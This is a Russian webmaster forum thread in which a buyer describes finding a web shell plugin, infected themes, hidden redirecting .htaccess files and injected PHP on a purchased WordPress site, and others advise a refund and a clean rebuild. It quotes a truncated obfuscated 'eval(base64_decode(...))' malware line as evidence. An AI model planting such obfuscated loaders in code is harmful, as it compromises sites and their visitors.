- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
в общем я продолжил анализ. Сайт на ВП, помимо плагина с шеллом обнаружил целый рассадник всего. Во первых в сайте было с пяток разных шаблонов причем каждый был с рассадой всякой дряни. Удалив все это и заменив на нормальный шаблон я обнаружил что проблемы не кончились. С мобильного меня редиректило хз куда, и я обнаружил целую кипу htaccess хитро замаскированных пробелами и редиректящих на самые разные сайты (в общей сложности их было более 30 штук по разным папкам). Далее я обнаружил в самых разных местах подозрительные куски (причем их было реально много)
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRl
и вот я все это почистив надеюсь что я ничего нигде не пропустил. И вроде сайт меня устраивает но после того как я целый день не разгибаясь чистил его и напильником обтачивал поражаясь тому как он весь завален шлаком, возникают резонные возмущения в адрес продавца который божится что он в продажах профи и за всю его долгую историю я первый и единственный с кем так получилось.
Вот как так?
в общем я продолжил анализ. Сайт на ВП, помимо плагина с шеллом обнаружил целый рассадник всего. Во первых в сайте было с пяток разных шаблонов причем каждый был с рассадой всякой дряни. Удалив все это и заменив на нормальный шаблон я обнаружил что проблемы не кончились. С мобильного меня редиректило хз куда, и я обнаружил целую кипу htaccess хитро замаскированных пробелами и редиректящих на самые разные сайты (в общей сложности их было более 30 штук по разным папкам). Далее я обнаружил в самых разных местах подозрительные куски (причем их было реально много)
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRl
и вот я все это почистив надеюсь что я ничего нигде не пропустил. И вроде сайт меня устраивает но после того как я целый день не разгибаясь чистил его и напильником обтачивал поражаясь тому как он весь завален шлаком, возникают резонные возмущения в адрес продавца который божится что он в продажах профи и за всю его долгую историю я первый и единственный с кем так получилось.
Вот как так?
да это все тут на каждом шагу встречается, а если у человека сайтов от 30-50 и более сателитов там и тд и тп - то кто проверяет то их ? да и некоторые вообще шаблоны не чистят и с ними заразу на сайт заносят - бывает и такое не зря же некоторые продвигаются ссылками из шаблонов и люди ведь их не убирают некоторые вообще (там же в шаблон бывают встроены куски кода лишние файлы и тд)
да это все тут на каждом шагу встречается, а если у человека сайтов от 30-50 и более сателитов там и тд и тп - то кто проверяет то их ? да и некоторые вообще шаблоны не чистят и с ними заразу на сайт заносят - бывает и такое не зря же некоторые продвигаются ссылками из шаблонов и люди ведь их не убирают некоторые вообще (там же в шаблон бывают встроены куски кода лишние файлы и тд)
фигасебе у вас подход ))) я себя прямо начал ощущать неправильным каким то )) такое ощущение что я прийдя на дискотеку поймал триппер а мне говорят "да ты че братуха, тут абсолютно все такие, это нормально, расслабься!" :DDD
возможно разумно попросить с продавца N-ую сумму денег назад, хотя бы за потраченное вами время на подчистку. Строго ИМХО )
возможно разумно попросить с продавца N-ую сумму денег назад, хотя бы за потраченное вами время на подчистку. Строго ИМХО )
Вполне разумно.
Раз товар ненадлежащего качества, скидка очень даже уместна.
Спасибо за советы
Ну вообще это конечно некомпетентность продавца, но это нынче не редкость и при покупке сайта советую просто всё сперва задампить, потом снести всё к чёрту, поставить старый двиг и накатить старую бд. Таким образом, можно обезопасить себя. Диз можно просто просканить авшниками, но я бы вам посоветовал протестировать на локи различных ав и поисковиков. Такой сайт могут запросто заблочить из-за плохого отношения к посетителям.
Перед покупкой сайтов всех своих клиентов мы предупреждаем о необходимости проверять все сайты на наличие шеллов и вирусов, т.к. заливая на свой хост можно занести заразу на все сайты, а если их например 50, то будет проблематично чистить их от всго лишнего.